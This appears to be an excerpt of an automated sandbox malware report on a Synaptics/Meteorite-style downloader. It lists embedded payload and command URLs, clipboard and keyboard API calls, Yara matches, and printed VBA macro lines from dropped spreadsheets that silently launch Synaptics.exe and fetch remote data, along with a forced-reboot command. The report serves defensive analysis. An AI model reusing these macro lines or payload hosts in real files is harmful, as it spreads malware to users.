                      Source: ._cache_1.exe, 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: http://lineage.ncsoft.co.kr/download/
                      Source: 2.exe.0.dr, ._cache_2.exe.5.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: 2.exe.0.dr, ._cache_2.exe.5.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: 2.exe.0.dr, ._cache_2.exe.5.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: 2.exe.0.dr, ._cache_2.exe.5.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: wic.exe, 0000000B.00000003.1814987251.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, cbas.exe, cbas.exe, 00000012.00000002.3537228980.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe, 00000012.00000002.3538064091.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, cbas.exe, 00000012.00000000.1920081415.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe.11.drString found in binary or memory: http://pasy.telefonicas.fyi/wwwww.php
                      Source: wic.exe, 0000000B.00000003.1814987251.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, cbas.exe, 00000012.00000002.3537228980.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe, 00000012.00000000.1920081415.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe.11.drString found in binary or memory: http://pasy.telefonicas.fyi/wwwww.phpC:
                      Source: 2.exe.0.dr, ._cache_2.exe.5.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: ._cache_1.exe, 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.lineageonline.jp/
                      Source: 1.exe, 00000001.00000003.1715627958.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlh
                      Source: 2[1].exe.0.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                      Source: Synaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                      Source: 2[1].exe.0.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                      Source: Synaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                      Source: 2[1].exe.0.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                      Source: Synaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                      Source: Synaptics.exe, 00000003.00000002.3537477101.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                      Source: Synaptics.exe, 00000003.00000003.2440072777.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2428940027.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3538251515.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2417824975.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2450428140.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/-
                      Source: Synaptics.exe, 00000003.00000002.3537477101.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/load?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                      Source: 1.exe, 00000001.00000003.1715627958.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                      Source: 2[1].exe.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                      Source: Synaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                      Source: 1.exe, 00000001.00000003.1715627958.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo4
                      Source: 2[1].exe.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                      Source: Synaptics.exe, 00000003.00000003.2428940027.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2450428140.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2417824975.00000000007E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                      Source: Synaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                      Source: Synaptics.exe, 00000003.00000003.2450428140.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2440072777.00000000007E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                      Source: Synaptics.exe, 00000003.00000002.3537477101.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                      Source: Synaptics.exe, 00000003.00000002.3537477101.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                      Source: Synaptics.exe, 00000003.00000002.3537477101.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                      Source: 1.exe, 00000001.00000003.1715627958.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                      Source: 1.exe, 00000001.00000003.1715627958.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                      Source: 2[1].exe.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                      Source: Synaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                      Source: Synaptics.exe, 00000003.00000002.3537477101.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.gook
                      Source: Synaptics.exe, 00000003.00000003.2450865873.0000000004805000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3538251515.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2428940027.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2450428140.00000000007C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                      Source: Synaptics.exe, 00000003.00000003.2417824975.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2440072777.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2428940027.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2450428140.00000000007C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/:
                      Source: Synaptics.exe, 00000003.00000003.2440072777.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOG
                      Source: Synaptics.exe, 00000003.00000002.3537477101.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                      Source: Synaptics.exe, 00000003.00000002.3537477101.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                      Source: Synaptics.exe, 00000003.00000003.2450428140.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2417824975.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2440072777.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2428940027.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                      Source: Synaptics.exe, 00000003.00000002.3537477101.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                      Source: Synaptics.exe, 00000003.00000002.3537477101.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                      Source: Synaptics.exe, 00000003.00000002.3537477101.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                      Source: Synaptics.exe, 00000003.00000002.3537477101.000000000073B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                      Source: Synaptics.exe, 00000003.00000002.3537477101.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                      Source: file.exe, 00000000.00000002.1801335644.000000000073B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800217674.000000000073B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1708777064.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: ._cache_2.exe, 00000008.00000003.1851226611.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1846288362.0000000000CF2000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1888790338.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1848850504.000000000B988000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1792819472.000000000B978000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1849571104.000000000B976000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1846016915.000000000B988000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1887786391.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1851226611.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1772719262.000000000674B000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1851185608.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1772791290.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1792637441.000000000B969000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1793242796.000000000B98A000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1838969140.000000000B988000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000002.1889810525.0000000000D08000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1887975788.000000000B978000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1792819472.000000000B98A000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1887786391.0000000000D04000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1850729652.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1792637441.000000000B978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rar.tw
                      Source: ._cache_2.exe, 00000008.00000003.1846288362.0000000000CF2000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1888790338.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1851185608.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000002.1889810525.0000000000D08000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1887786391.0000000000D04000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1850729652.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1846620779.0000000000CFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rar.tw)
                      Source: ._cache_2.exe, 00000008.00000003.1846288362.0000000000CF2000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1888790338.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1851185608.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1846217794.000000000B992000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1848955591.000000000B9D3000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1838969140.000000000B988000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000002.1889810525.0000000000D08000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1887786391.0000000000D04000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1850992310.000000000B9D3000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1850729652.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1845387925.000000000B991000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1849331101.000000000B9D3000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1846950203.000000000B9D2000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1839631873.000000000B98B000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1846620779.0000000000CFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rar.tw/
                      Source: 1.exe, 00000001.00000003.1715627958.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=0
                      Source: 2[1].exe.0.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                      Source: Synaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                      Source: 1.exe, 00000001.00000003.1715627958.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                      Source: 2[1].exe.0.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                      Source: Synaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                      Source: 2[1].exe.0.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                      Source: Synaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                      Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49845 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49852 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49876 version: TLS 1.2
                      Source: C:\Program Files (x86)\3.exeCode function: 7_2_00401000 OpenClipboard,GetClipboardData,GlobalLock,lstrlenW,lstrcpyW,lstrlenW,GlobalUnlock,CloseClipboard,7_2_00401000
                      Source: C:\Program Files (x86)\3.exeCode function: 7_2_00401110 lstrlenW,lstrlenW,lstrlenW,GlobalAlloc,lstrlenW,GlobalLock,lstrcpynW,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_00401110
                      Source: C:\Program Files (x86)\3.exeCode function: 7_2_00401000 OpenClipboard,GetClipboardData,GlobalLock,lstrlenW,lstrcpyW,lstrlenW,GlobalUnlock,CloseClipboard,7_2_00401000
                      Source: C:\Windows\wic.exeCode function: 11_2_00F1E9D8 GetKeyboardState,GetKeyboardLayout,MapVirtualKeyA,ToAsciiEx,LoadAcceleratorsW,LoadAcceleratorsW,11_2_00F1E9D8
                      Source: C:\Windows\wic.exeCode function: 11_2_00EA146C GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_00EA146C

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: file.exe, type: SAMPLEMatched rule: Detects Meteorite downloader Author: ditekSHen
                      Source: 3.3.Synaptics.exe.20c4000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meteorite downloader Author: ditekSHen
                      Source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Meteorite downloader Author: ditekSHen
                      Source: 3.3.Synaptics.exe.20c4000.0.unpack, type: UNPACKEDPEMatched rule: Detects Meteorite downloader Author: ditekSHen
                      Source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Meteorite downloader Author: ditekSHen
                      Source: 3.3.Synaptics.exe.755cc8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meteorite downloader Author: ditekSHen
                      Source: 00000003.00000003.1718137982.00000000020C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meteorite downloader Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\RCXF376.tmp, type: DROPPEDMatched rule: Detects Meteorite downloader Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\RCXF308.tmp, type: DROPPEDMatched rule: Detects Meteorite downloader Author: ditekSHen
                      Document contains an embedded VBA macro with suspicious strings
                      Source: SiyGYB3T.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                      Source: SiyGYB3T.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                      Source: SiyGYB3T.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                      Source: SiyGYB3T.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                      Source: SiyGYB3T.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                      Source: SiyGYB3T.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                      Source: SiyGYB3T.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                      Source: SiyGYB3T.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                      Source: SiyGYB3T.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                      Source: SiyGYB3T.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                      Source: SiyGYB3T.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                      Source: HTAGVDFUIE.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                      Source: HTAGVDFUIE.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                      Source: HTAGVDFUIE.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                      Source: HTAGVDFUIE.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                      Source: HTAGVDFUIE.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                      Source: HTAGVDFUIE.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                      Source: HTAGVDFUIE.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                      Source: HTAGVDFUIE.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                      Source: HTAGVDFUIE.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                      Source: HTAGVDFUIE.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                      Source: HTAGVDFUIE.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                      Document contains an embedded VBA with functions possibly related to ADO stream file operations
                      Source: SiyGYB3T.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                      Source: HTAGVDFUIE.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                      Document contains an embedded VBA with functions possibly related to HTTP operations
                      Source: SiyGYB3T.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                      Source: HTAGVDFUIE.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                      Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                      Source: SiyGYB3T.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                      Source: HTAGVDFUIE.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                      Uses shutdown.exe to shutdown or reboot the system
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00409080 CreateFontIndirectA,73A1A570,SetBkMode,GetObjectA,SelectObject,73A24D40,DeleteDC,NtdllDefWindowProc_A,CreateWindowExA,CreateWindowExA,SelectObject,73A24D40,DeleteDC,73A1A570,SetBkMode,GetObjectA,SelectObject,SetTextColor,SetTextAlign,TextOutA,EndDialog,2_2_00409080
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004093C0 InvalidateRect,InvalidateRect,InvalidateRect,InvalidateRect,InvalidateRect,InvalidateRect,InvalidateRect,73A1A570,SetBkMode,GetObjectA,SelectObject,GetPixel,DeleteDC,GetObjectA,SelectObject,GetPixel,DeleteDC,GetObjectA,SelectObject,GetPixel,DeleteDC,ScrollWindow,InvalidateRect,InvalidateRect,InvalidateRect,ScrollWindow,InvalidateRect,InvalidateRect,InvalidateRect,InvalidateRect,ScrollWindow,InvalidateRect,InvalidateRect,NtdllDefWindowProc_A,2_2_004093C0
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DDBAC0 SetWindowLongW,NtdllDefWindowProc_W,8_2_00DDBAC0
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DCA98F: __EH_prolog3_GS,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,8_2_00DCA98F
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\wic.exeJump to behavior
                      Source: C:\Windows\wic.exeFile created: C:\Windows\cbas.exe
                      Source: C:\Windows\wic.exeFile created: C:\Windows\msslac.dll
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0040A8F02_2_0040A8F0
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0040DCA02_2_0040DCA0
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0040D8B02_2_0040D8B0
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00407D502_2_00407D50
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0040F2032_2_0040F203
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00405AF02_2_00405AF0
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0040D2A02_2_0040D2A0
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004093C02_2_004093C0
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0040E7902_2_0040E790
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DD28F18_2_00DD28F1
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DDEC708_2_00DDEC70
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DDA2158_2_00DDA215
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DDA33B8_2_00DDA33B
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DD468E8_2_00DD468E
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DEA78C8_2_00DEA78C
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DC47B88_2_00DC47B8
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DC67588_2_00DC6758
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DF88A08_2_00DF88A0
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DD598F8_2_00DD598F
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DF7AD88_2_00DF7AD8
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DC7AEC8_2_00DC7AEC
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DEAAEB8_2_00DEAAEB
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DD8A6B8_2_00DD8A6B
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DF2B508_2_00DF2B50
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DC3CD48_2_00DC3CD4
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DD4E378_2_00DD4E37
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DF2FFB8_2_00DF2FFB
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DCBFB08_2_00DCBFB0
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D292C69_2_00D292C6
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D37DDC9_2_00D37DDC
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D350119_2_00D35011
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D302F79_2_00D302F7
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D352829_2_00D35282
